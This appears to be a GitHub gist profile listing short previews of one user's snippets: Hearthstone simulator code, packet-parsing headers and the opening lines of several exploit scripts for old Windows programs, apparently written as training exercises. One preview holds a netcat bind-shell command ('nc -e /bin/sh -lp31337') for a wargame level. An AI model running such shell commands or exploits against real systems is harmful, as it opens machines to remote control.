Skip to content

Instantly share code, notes, and snippets.

View synap5e's full-sized avatar

Simon Pinfold synap5e

View GitHub Profile
#!/usr/bin/env python2
target = ('127.0.0.1', 20003)
command = ['/bin/nc', '-e/bin/sh', '-lp31337']
"""
ltrace -i -p `ps -Af | grep level03 | grep -v -e grep -e python | tail -n 1 | cut -c 9-16`
echo attach `ps -Af | grep level03 | grep -v -e grep -e python | tail -n 1 | cut -c 9-16` > .gdbinit && gdb -q -iex "set auto-load safe-path /home/simon/Desktop/fusion"
"""
#!/usr/bin/env python
import sys; sys.path.append("..")
from fireplace.cards.heroes import *
from test_main import prepare_game
IMP_GANG_BOSS = 'BRM_006'
IMP = 'BRM_006t'
class Branch:
def __init__(self, **kwds):
self.__dict__.update(kwds)
def possible_actions(game):
for card_index, card in enumerate(game.current_player.hand):
if card.is_playable() and card.id != WISP: # wisps are the deck filler
if card.has_target():
for target_index, target in enumerate(card.targets):
new_game = copy.deepcopy(game)
import sys; sys.path.append("./fireplace")
from fireplace import utils, cards, targeting
import fireplace
from fireplace.cards import heroes
from fireplace.player import Player
from fireplace.game import BaseGame, GameOver
from fireplace.card import Minion
from fireplace.enums import CardType, GameTag
from collections import defaultdict
#!/usr/bin/env python2
# encoding: utf-8
import sys, time, binascii, struct
import pdb
import scapy.all as scapy
from scapy.all import IP, TCP
from hexdump import hexdump
import hsproto_pb2 as hsproto
using System;
using System.Collections;
using System.Collections.Generic;
using System.ComponentModel;
using System.IO;
using System.Net;
using System.Reflection;
using System.Runtime.Serialization.Formatters.Binary;
using System.Text;
using System.Threading;
@synap5e
synap5e / freefloat_ftp_1_lcd_exploit.py
Created November 9, 2012 23:52
Freefloat FTP Server - "lcd" command stack overflow
import sys, socket, struct
# Freefloat FTP Server - "lcd" command stack overflow
# Version 1.0 - DEP + ASLR disabled
# Tested: Windows XP SP3 - English
# Author: Simon Pinfold
#
# windows/messagebox - 287 bytes
@synap5e
synap5e / easy_rm_to_mp3_2_7_3_700_dep_aslr_exploit.py
Created November 10, 2012 21:29
Easy RM to MP3 Converter - ".m3u" Windows 7 DEP + ASLR Local Exploit
#!/usr/bin/python
# Easy RM to MP3 Converter - Windows 7 DEP + ASLR Local Exploit
# Version 2.7.3.700 on Windows 7
# Tested: Windows 7 Ultimate SP0 - English
# Author: Simon Pinfold
import struct, os
@synap5e
synap5e / eureka_email_2_2q_egghunter_err_egghunter_exploit.py
Created November 10, 2012 21:27
Eureka Email 2.2q - "-ERR" Egghunter Exploit
import sys, socket, struct
# Eureka Email 2.2q - "-ERR" Egghunter Exploit
# Version 2.2q - DEP + ASLR disabled
# Tested: Windows XP SP3 - English
# Author: Simon Pinfold
#
# windows/messagebox - 287 bytes
# http://www.metasploit.com
@synap5e
synap5e / soritong_1_m3u_exploit.py
Created November 10, 2012 21:23
Soritong 1.0 Client side exploit (SEH)
#!/usr/bin/python
import os
# Soritong 1.0 Client side exploit (SEH)
# Author: Simon Pinfold
#
# windows/messagebox - 287 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai